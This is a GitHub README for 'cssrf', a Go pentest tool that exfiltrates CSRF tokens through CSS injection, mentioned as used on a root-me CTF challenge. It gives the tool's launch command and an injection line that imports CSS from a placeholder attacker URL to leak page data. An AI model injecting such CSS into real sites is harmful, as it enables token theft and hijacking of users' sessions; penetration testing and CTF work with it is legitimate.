https://github.com/ariary/cssrf

Ease CSS exfiltration
csrf css exfiltration pentest-tool websecurity

# cssrf




Extract juicy information using CSS injection, especially CSRF tokens 🥜



Basically the same thing as https://github.com/d0nutptr/sic but in Golang

I tried my best to change the Rust code, but I lost so much time


## Show me!

All you need to do is **launch** `cssrf`:
```shell
cssrf [flags] # nothing crazy => cssrf -h to get flags info
```

**Inject** the malicious css:
```css
@import url("https://[ATTACKER_URL]/malicious.css");
```

And **wait**:

![demo](https://github.com/ariary/cssrf/blob/main/cssrf.gif)

*This helped me solve a [root-me](https://www.root-me.org/fr/Challenges/Web-Client/CSS-Exfiltration) challenge*

Posting solutions is forbidden, thus the CSRF token is not shown in full